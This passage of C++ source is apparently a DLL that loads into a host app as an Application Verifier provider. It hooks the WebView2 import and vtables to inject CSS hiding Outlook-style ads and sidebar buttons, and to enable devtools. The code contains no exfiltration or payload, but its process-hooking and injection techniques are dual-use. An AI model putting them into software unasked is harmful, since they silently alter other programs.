hookAddr); 133 | #endif 134 | FreeLibrary(lib); 135 | return TRUE; 136 | } 137 | FreeLibrary(lib); 138 | return FALSE; 139 | } 140 | } 141 | functhunk++; 142 | firstthunk++; 143 | } 144 | } 145 | dload++; 146 | } 147 | FreeLibrary(lib); 148 | return FALSE; 149 | } 150 | #pragma endregion 151 | 152 | #pragma region "Hooks" 153 | /* 154 | LRESULT(*__WndProc)(HWND, UINT, WPARAM, LPARAM) = nullptr; 155 | LRESULT _WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) { 156 | return __WndProc(hWnd, uMsg, wParam, lParam); 157 | } 158 | */ 159 | 160 | HRESULT(*__ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke)(ICoreWebView2CreateCoreWebView2ControllerCompletedHandler* _this, HRESULT, ICoreWebView2Controller*) = nullptr; 161 | HRESULT STDMETHODCALLTYPE _ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke(ICoreWebView2CreateCoreWebView2ControllerCompletedHandler* _this, HRESULT errorCode, ICoreWebView2Controller* createdController) { 162 | if (createdController != nullptr) { 163 | winrt::com_ptr webview; 164 | winrt::check_hresult(createdController->get_CoreWebView2(webview.put())); 165 | 166 | EventRegistrationToken tkn_NavigationCompleted; 167 | winrt::check_hresult(webview->add_NavigationCompleted(Microsoft::WRL::Callback([](ICoreWebView2* sender, ICoreWebView2NavigationCompletedEventArgs* args) -> HRESULT { 168 | 169 | auto script = L"\ 170 | const styleElement = document.createElement('style');\n\ 171 | const cssClass = \"\ 172 | #OwaContainer, #OwaContainerSlot1, " /* First "email" ad when online */ L"\ 173 | .kk1xx._Bfyd.iIsOF.IjQyD, .kk1xx.lHRXq.iIsOF.IjQyD, " /* First "email" ad when offline */ L"\ 174 | .syTot, " /* Lower left OneDrive subscription banner */ L"\ 175 | [id='34318026-c018-414b-abb3-3e32dfb9cc4c'], " /* Word button in sidebar */ L"\ 176 | [id='c5251a9b-a95d-4595-91ee-a39e6eed3db2'], " /* Excel button in sidebar */ L"\ 177 | [id='48cb9ead-1c19-4e1f-8ed9-3d60a7e52b18'], " /* PowerPoint button in sidebar */ L"\ 178 | 
[id='59391057-d7d7-49fd-a041-d8e4080f05ec'], " /* To Do button in sidebar */ L"\ 179 | [id='39109bd4-9389-4731-b8d6-7cc1a128d0b3'], " /* OneDrive button in sidebar */ L"\ 180 | .___1fkhojs.f22iagw.f122n59.f1vx9l62.f1c21dwh.fqerorx.f1i5mqs4, " /* More apps button in sidebar */ L"\ 181 | [id='D64D0004-2A11-442B-9586-F49009D4852B'] { display: none !important; }\";\n\ 182 | styleElement.appendChild(document.createTextNode(cssClass));\n\ 183 | document.head.appendChild(styleElement);\n\ 184 | "; 185 | // .root-192, .splitButtonMenuButton-220 { background-color: transparent !important; color: var(--neutralDark) !important; } " /* Deemphasize New mail button */ L"\ 186 | 187 | //::MessageBoxW(nullptr, script, L"", 0); 188 | sender->ExecuteScript(script, Microsoft::WRL::Callback([&](HRESULT errorCode, LPCWSTR resultObjectAsJson) -> HRESULT { 189 | return S_OK; 190 | }).Get()); 191 | 192 | return S_OK; 193 | }).Get(), &tkn_NavigationCompleted)); 194 | 195 | volatile int dummyF12Enabled = 0; 196 | const wchar_t* isF12Enabled = L"y_1A36CD25-E20F-4D0D-B1E6-3CC4307E1488"; 197 | if (isF12Enabled[0 + dummyF12Enabled] == L'y') { 198 | EventRegistrationToken tkn_AcceleratorKeyPressed; 199 | winrt::check_hresult(createdController->add_AcceleratorKeyPressed(Microsoft::WRL::Callback([](ICoreWebView2Controller* sender, ICoreWebView2AcceleratorKeyPressedEventArgs* args) -> HRESULT { 200 | 201 | COREWEBVIEW2_KEY_EVENT_KIND kind; 202 | winrt::check_hresult(args->get_KeyEventKind(&kind)); 203 | if (kind == COREWEBVIEW2_KEY_EVENT_KIND_KEY_UP) { 204 | UINT key; 205 | winrt::check_hresult(args->get_VirtualKey(&key)); 206 | if (key == VK_F12) { 207 | winrt::check_hresult(args->put_Handled(true)); 208 | winrt::com_ptr webview; 209 | winrt::check_hresult(sender->get_CoreWebView2(webview.put())); 210 | webview->OpenDevToolsWindow(); 211 | } 212 | } 213 | 214 | return S_OK; 215 | }).Get(), &tkn_AcceleratorKeyPressed)); 216 | } 217 | 218 | /* 219 | HWND parentWindow = nullptr; 220 | 
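createdController->get_ParentWindow(&parentWindow);
        ::SetLastError(0);
        __WndProc = reinterpret_cast(::GetWindowLongPtrW(parentWindow, GWLP_WNDPROC));
        if (::GetLastError() == ERROR_SUCCESS && __WndProc) {
            ::SetWindowLongPtrW(parentWindow, GWLP_WNDPROC, reinterpret_cast(_WndProc));
        }
        */
    }

    //::MessageBoxW(nullptr, L"Hello from _ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke", L"", 0);
    return __ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke(_this, errorCode, createdController);
}

// Saved original of ICoreWebView2Environment::CreateCoreWebView2Controller.
// Filled in by _ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke when it swaps the vtable slot.
HRESULT(*__ICoreWebView2Environment_CreateCoreWebView2Controller)(ICoreWebView2Environment*, HWND, ICoreWebView2CreateCoreWebView2ControllerCompletedHandler*) = nullptr;

// Replacement for slot 3 of the ICoreWebView2Environment vtable (slots 0-2 are the IUnknown methods).
//
// Before forwarding to the saved original, it redirects slot 3 (Invoke) of the caller's
// completion handler to _ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke,
// so that hook runs once the controller exists.
//
// _this, parentWindow and controllerCompletedHandler are passed through unchanged.
// Returns whatever the original method returns.
HRESULT STDMETHODCALLTYPE _ICoreWebView2Environment_CreateCoreWebView2Controller(ICoreWebView2Environment* _this, HWND parentWindow, ICoreWebView2CreateCoreWebView2ControllerCompletedHandler* controllerCompletedHandler) {
    // A null handler has no vtable to read; skip the patch and let the real method reject the argument.
    if (controllerCompletedHandler) {
        void** controllerCompletedHandlerVtbl = *(void***)controllerCompletedHandler;
        // Patch once per vtable: the slot already holding the hook means a previous call did the work.
        // NOTE(review): only one original pointer is kept, so a second handler class with a different
        // vtable would overwrite it — presumably the host uses a single handler type; verify.
        if (controllerCompletedHandlerVtbl[3] != _ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke) {
            //::MessageBoxW(nullptr, L"Patching controllerCompletedHandlerVtbl", L"", 0);
            DWORD oldProtect = 0;
            // NOTE(review): the slot is data, so PAGE_READWRITE would avoid a transient
            // writable+executable page, provided the vtable does not share a page with code —
            // confirm before changing. The same applies to the two other patch sites below.
            if (::VirtualProtect(&controllerCompletedHandlerVtbl[3], sizeof(uintptr_t), PAGE_EXECUTE_READWRITE, &oldProtect)) {
                __ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke = reinterpret_cast<decltype(__ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke)>(controllerCompletedHandlerVtbl[3]);
                controllerCompletedHandlerVtbl[3] = _ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke;
                // Put the previous page protection back once the slot is written.
                ::VirtualProtect(&controllerCompletedHandlerVtbl[3], sizeof(uintptr_t), oldProtect, &oldProtect);
            }
        }
    }

    //::MessageBoxW(nullptr, L"Hello from _ICoreWebView2Environment_CreateCoreWebView2Controller", L"", 0);
    return __ICoreWebView2Environment_CreateCoreWebView2Controller(_this, parentWindow, controllerCompletedHandler);
}

// Saved original Invoke of the environment-completed handler; set by _CreateCoreWebView2EnvironmentWithOptions.
HRESULT(*__ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke)(ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler* _this, HRESULT, ICoreWebView2Environment*) = nullptr;

// Replacement for slot 3 (Invoke) of the environment-completed handler's vtable.
//
// When an environment is delivered, it redirects slot 3 of that environment's vtable to
// _ICoreWebView2Environment_CreateCoreWebView2Controller, then forwards to the saved original Invoke.
//
// Returns whatever the original Invoke returns.
HRESULT STDMETHODCALLTYPE _ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke(ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler* _this, HRESULT errorCode, ICoreWebView2Environment* createdEnvironment) {
    // createdEnvironment may be null when creation failed (errorCode then carries the failure);
    // dereferencing it would crash the host, so in that case the call is only forwarded.
    if (createdEnvironment) {
        void** createdEnvironmentVtbl = *(void***)createdEnvironment;
        if (createdEnvironmentVtbl[3] != _ICoreWebView2Environment_CreateCoreWebView2Controller) {
            //::MessageBoxW(nullptr, L"Patching createdEnvironmentVtbl", L"", 0);
            DWORD oldProtect = 0;
            if (::VirtualProtect(&createdEnvironmentVtbl[3], sizeof(uintptr_t), PAGE_EXECUTE_READWRITE, &oldProtect)) {
                __ICoreWebView2Environment_CreateCoreWebView2Controller = reinterpret_cast<decltype(__ICoreWebView2Environment_CreateCoreWebView2Controller)>(createdEnvironmentVtbl[3]);
                createdEnvironmentVtbl[3] = _ICoreWebView2Environment_CreateCoreWebView2Controller;
                ::VirtualProtect(&createdEnvironmentVtbl[3], sizeof(uintptr_t), oldProtect, &oldProtect);
            }
        }
    }

    //::MessageBoxW(nullptr, L"Hello from _ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke", L"", 0);
    return __ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke(_this, errorCode, createdEnvironment);
}

// Real CreateCoreWebView2EnvironmentWithOptions export, resolved from WebView2Loader.dll on first use.
HRESULT(*__CreateCoreWebView2EnvironmentWithOptions)(PCWSTR, PCWSTR, ICoreWebView2EnvironmentOptions*, ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler*) = nullptr;

// Stand-in for the CreateCoreWebView2EnvironmentWithOptions export; DllMain points the host's
// import at this function.
//
// It redirects slot 3 (Invoke) of the caller's completion handler to
// _ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke, resolves the real export
// if that has not happened yet, and forwards all four arguments unchanged.
//
// Returns the real export's HRESULT, or a Win32-derived failure HRESULT when the loader module
// or the export cannot be found. Failures are reported by return value because this function is
// called through a C ABI and an exception must not unwind into the host's frames.
STDAPI _CreateCoreWebView2EnvironmentWithOptions(PCWSTR browserExecutableFolder, PCWSTR userDataFolder, ICoreWebView2EnvironmentOptions* environmentOptions, ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler* environmentCreatedHandler) {
    // A null handler has no vtable to read; skip the patch and let the real export reject the argument.
    if (environmentCreatedHandler) {
        void** environmentCreatedHandlerVtbl = *(void***)environmentCreatedHandler;
        if (environmentCreatedHandlerVtbl[3] != _ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke) {
            //::MessageBoxW(nullptr, L"Patching environmentCreatedHandlerVtbl", L"", 0);
            DWORD oldProtect = 0;
            if (::VirtualProtect(&environmentCreatedHandlerVtbl[3], sizeof(uintptr_t), PAGE_EXECUTE_READWRITE, &oldProtect)) {
                __ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke = reinterpret_cast<decltype(__ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke)>(environmentCreatedHandlerVtbl[3]);
                environmentCreatedHandlerVtbl[3] = _ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke;
                ::VirtualProtect(&environmentCreatedHandlerVtbl[3], sizeof(uintptr_t), oldProtect, &oldProtect);
            }
        }
    }

    if (!__CreateCoreWebView2EnvironmentWithOptions) {
        // GetModuleHandleW only finds an already-loaded module; it does not load one.
        const HMODULE hMod = ::GetModuleHandleW(L"WebView2Loader.dll");
        if (!hMod) {
            return HRESULT_FROM_WIN32(::GetLastError());
        }
        const auto realExport = reinterpret_cast<decltype(__CreateCoreWebView2EnvironmentWithOptions)>(::GetProcAddress(hMod, "CreateCoreWebView2EnvironmentWithOptions"));
        if (!realExport) {
            return HRESULT_FROM_WIN32(::GetLastError());
        }
        __CreateCoreWebView2EnvironmentWithOptions = realExport;
    }
    //::MessageBoxW(nullptr, L"Hello from _CreateCoreWebView2EnvironmentWithOptions", L"", 0);
    return __CreateCoreWebView2EnvironmentWithOptions(browserExecutableFolder, userDataFolder, environmentOptions, environmentCreatedHandler);
}
#pragma endregion

#pragma region "AppVerifier infrastructure"
// Reason code DllMain handles in addition to the four standard DLL_* notifications.
#define DLL_PROCESS_VERIFIER 4

// The verifier structures are declared locally; presumably the SDK headers in use do not
// provide them. Their layout has to match what the loader reads — verify against the target OS.
typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {
    PCHAR ThunkName;
    PVOID ThunkOldAddress;
    PVOID ThunkNewAddress;
} RTL_VERIFIER_THUNK_DESCRIPTOR, * PRTL_VERIFIER_THUNK_DESCRIPTOR;

typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {
    PWCHAR DllName;
    ULONG DllFlags;
    PVOID DllAddress;
    PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks;
} RTL_VERIFIER_DLL_DESCRIPTOR, * PRTL_VERIFIER_DLL_DESCRIPTOR;

typedef void (NTAPI* RTL_VERIFIER_DLL_LOAD_CALLBACK) (
    PWSTR DllName,
    PVOID DllBase,
    SIZE_T DllSize,
    PVOID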
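Reserved);
typedef void (NTAPI* RTL_VERIFIER_DLL_UNLOAD_CALLBACK) (
    PWSTR DllName,
    PVOID DllBase,
    SIZE_T DllSize,
    PVOID Reserved);
typedef void (NTAPI* RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK) (
    PVOID AllocationBase,
    SIZE_T AllocationSize);

// Descriptor a verifier provider hands back to the loader. Declared locally; the layout has to
// match what the loader reads — verify against the target OS.
typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {
    ULONG Length;
    PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls;
    RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback;
    RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback;

    PWSTR VerifierImage;
    ULONG VerifierFlags;
    ULONG VerifierDebug;

    PVOID RtlpGetStackTraceAddress;
    PVOID RtlpDebugPageHeapCreate;
    PVOID RtlpDebugPageHeapDestroy;

    RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;
} RTL_VERIFIER_PROVIDER_DESCRIPTOR;

// Single zero-initialised entry; presumably read by the loader as an empty thunk list, so no
// hook is requested through the verifier mechanism itself.
RTL_VERIFIER_DLL_DESCRIPTOR noHooks{};
// Descriptor published from DllMain: its size, the empty DLL list, and do-nothing callbacks.
// The redirection this module performs is done by import-table patching in DllMain, not here.
RTL_VERIFIER_PROVIDER_DESCRIPTOR desc = {
    sizeof(desc),
    &noHooks,
    [](auto, auto, auto, auto) {},
    [](auto, auto, auto, auto) {},
    nullptr, 0, 0,
    nullptr, nullptr, nullptr,
    [](auto, auto) {},
};
#pragma endregion

// DLL entry point.
//
// DLL_PROCESS_ATTACH turns off per-thread notifications; the thread and detach reasons do
// nothing. DLL_PROCESS_VERIFIER (reason 4) is where the module does its work: lpvReserved is
// treated as an out-pointer that receives the provider descriptor, and the host executable's
// import of CreateCoreWebView2EnvironmentWithOptions from WebView2Loader.dll is redirected to
// _CreateCoreWebView2EnvironmentWithOptions.
//
// NOTE(review): being loaded with reason 4 depends on a per-image verifier registration
// (Image File Execution Options) made outside this file; that registration and the resulting
// module load in the host process are what to look at when auditing where this DLL runs.
//
// Always returns TRUE.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        ::DisableThreadLibraryCalls(hinstDLL);
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_PROCESS_VERIFIER:
        // Publish the descriptor only when the loader supplied somewhere to store it.
        if (lpvReserved) {
            *(PVOID*)lpvReserved = &desc;
        }
        // VnPatchIAT / VnPatchDelayIAT are declared elsewhere; judging by the arguments they
        // rewrite the regular and delay-load import entries of the host executable
        // (GetModuleHandleW(nullptr)). Their results are not checked, so a failed patch simply
        // leaves the host calling the real export.
        // NOTE(review): the cast's target type is assumed to be uintptr_t — confirm against
        // the declarations of VnPatchIAT and VnPatchDelayIAT.
        ::VnPatchIAT(::GetModuleHandleW(nullptr), "WebView2Loader.dll", "CreateCoreWebView2EnvironmentWithOptions", reinterpret_cast<uintptr_t>(_CreateCoreWebView2EnvironmentWithOptions));
        ::VnPatchDelayIAT(::GetModuleHandleW(nullptr), "WebView2Loader.dll", "CreateCoreWebView2EnvironmentWithOptions", reinterpret_cast<uintptr_t>(_CreateCoreWebView2EnvironmentWithOptions));
        break;
    }
    return TRUE;
}

--------------------------------------------------------------------------------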